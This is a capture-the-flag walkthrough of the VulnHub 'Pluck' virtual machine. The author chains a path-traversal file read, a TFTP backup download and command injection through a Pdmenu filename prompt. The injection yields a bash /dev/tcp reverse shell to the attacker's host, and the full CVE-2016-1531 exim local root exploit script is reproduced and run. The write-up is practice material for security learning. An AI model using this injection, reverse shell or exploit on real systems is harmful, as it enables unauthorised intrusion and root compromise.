Pluck
Location
https://download.vulnhub.com/pluck/pluck.ova.zip
Description
It’s the first boot2root from @ryanoberto.
Other then ‘enjoy’ there is not much of a description of the VM.
Getting started
Starting with a Sparta scan.
SSH, HTTP, MySQL and LLMNR.
- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.171.4 + Target Hostname: 192.168.171.4 + Target Port: 80 + Start Time: 2017-03-26 15:56:54 (GMT2) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php) + OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected. + OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected. + OSVDB-3092: /admin.php: This might be interesting... + OSVDB-3268: /images/: Directory indexing found. + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found. + Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 + OSVDB-3233: /icons/README: Apache default file found. + 7535 requests: 0 error(s) and 12 item(s) reported on remote host + End Time: 2017-03-26 15:58:15 (GMT2) (81 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Several interesting finds with Nikto. I start with the ‘path traversal’ vulnerability and view the ‘/ect/passwd’ file.
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:109::/var/run/dbus:/bin/false mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false lxd:x:108:65534::/var/lib/lxd/:/bin/false uuidd:x:109:114::/run/uuidd:/bin/false dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin pollinate:x:112:1::/var/cache/pollinate:/bin/false bob:x:1000:1000:bob,,,:/home/bob:/bin/bash Debian-exim:x:113:119::/var/spool/exim4:/bin/false peter:x:1001:1001:,,,:/home/peter:/bin/bash paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
So ‘bob, ‘peter’, ‘paul’ and ‘backup-user’. Both ‘paul’ as ‘backup-user’ has some interesting shells.
When I use the same vulnerability as before I get the content of the ‘backup.sh’ file.
######################## # Server Backup script # ######################## #Backup directories in /backups so we can get it via tftp echo "Backing up data" tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null echo "Backup complete"
So there is a ‘backup.tar’ file. After downloading the file I extract it to see the content.
tftp> get 192.168.171.4:/backups/backup.tar Received 1824718 bytes in 10.9 seconds
After examination I got the keys to Paul’s kingdom.
Like most keys…..you need to find the one which fits the lock and after a few tries, the fourth results in this.
Pdmenu
┌─────Main Menu─────┐
│ Directory listing │
│ Change directory │
│ Edit file │
│ Who's online? │
│ WWW │
│ Telnet │
│ Ping │
│ │
│ Exit │
└───────────────────┘
Welcome to Pdmenu 1.3.4 by Joey Hess <joey@kitenet.net>
‘Pdmenu‘…..I’ve seen that before. After some toying around I get to the ‘Edit file’ option.
When typing in the name of a file, I can alter that file. But because there is no (or at least poor) input validation, I can concatenate multiple commands.
Pdmenu
┌─────Main Menu─────┐
│ Directory listing │
│ Change directory │
│ Edit file │
┌─────────────────────────────────filename?──────────────────────────────────┐
│ admin.php && id │
└────────────────────────────────────────────────────────────────────────────┘
│ Ping │
│ │
│ Exit │
└───────────────────┘
Press Enter when done, or Esc to cancel
uid=1002(paul) gid=1002(paul) groups=1002(paul)
With this knowledge I use bash to call out to my local machine and create a reverse shell.
Pdmenu
┌─────Main Menu─────┐
│ Directory listing │
│ Change directory │
│ Edit file │
┌─────────────────────────────────filename?──────────────────────────────────┐
│ 1 && bash -c "bash -i >& /dev/tcp/192.168.171.3/31337 0>&1" │
└────────────────────────────────────────────────────────────────────────────┘
│ Ping │
│ │
│ Exit │
└───────────────────┘
Press Enter when done, or Esc to cancel
Listening on [0.0.0.0] (family 0, port 31337) Connection from 192.168.171.4 38194 received! paul@pluck:/home/bob$ id id uid=1002(paul) gid=1002(paul) groups=1002(paul)
A good way to start enumeration is to check which files has the SUID bit set. Users will get file owner’s permissions as well as owner UID and GID when executing these files. If there’s a vulnerability in the program of these files, I maybe can escalate my privileges.
paul@pluck:/$ find / -perm -4000 2>/dev/null find / -perm -4000 2>/dev/null /usr/exim/bin/exim-4.84-7 /usr/bin/passwd /usr/bin/at /usr/bin/newgrp /usr/bin/pkexec /usr/bin/sudo /usr/bin/traceroute6.iputils /usr/bin/newuidmap /usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgidmap /usr/bin/chsh /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/s-nail/s-nail-privsep /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /bin/su /bin/umount /bin/mount /bin/fusermount /bin/ping /bin/ntfs-3g
No clue what ‘/exim/’ is, but after some google wisdom I can tell it’s a Mail Transfer Agent. And lucky for me……there is an exploit available.
I create a bash file in ‘/tmp/’ and run it to escalate my privilege.
paul@pluck:/tmp/n13mant$ cat exim.sh
cat exim.sh
VE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
paul@pluck:/tmp/n13mant$./exim.sh
./exim.sh: 1: ./exim.sh: cannot open =: No such file
./exim.sh: 1: ./exim.sh: VE-2016-1531: not found
[ CVE-2016-1531 local root exploit
id
uid=0(root) gid=1002(paul) groups=1002(paul)
Now to get the flag.
cd /root ls -lah total 48K drwx------ 2 root root 4.0K Jan 25 13:28 . drwxr-xr-x 23 root root 4.0K Jan 18 11:14 .. -rw------- 1 root root 1 Jan 20 08:58 .bash_history -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc -rw-r--r-- 1 root root 599 Jan 19 06:07 flag.txt -rw------- 1 root root 84 Jan 20 09:00 .lesshst -rw------- 1 root root 81 Jan 18 12:00 .mysql_history -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw------- 1 root root 11K Jan 25 13:28 .viminfo -rw-r--r-- 1 root root 209 Jan 18 19:40 .wget-hsts cat flag.txt Congratulations you found the flag --------------------------------------- ###### (((((((((((((((((((((((((((((( ######### ((((((((((((((((((((((((((( ,,########## (((((((((((((((((((((((( @@,,,########## ((((((((((((((((((((( @@@@@,,,########## @@@@@@@@,,,############################ @@@@@@@@@@@,,,######################### @@@@@@@@@,,,########################### @@@@@@,,,########## @@@,,,########## &&&&&&&&&&&&&&&&&&&& ,,,########## &&&&&&&&&&&&&&&&&&&&&&& ########## &&&&&&&&&&&&&&&&&&&&&&&&&& ####### &&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Conclusion
This was a fun first boot2root form this author. It had some nice features and I can’t wait for the next one. Keep up the good work!!!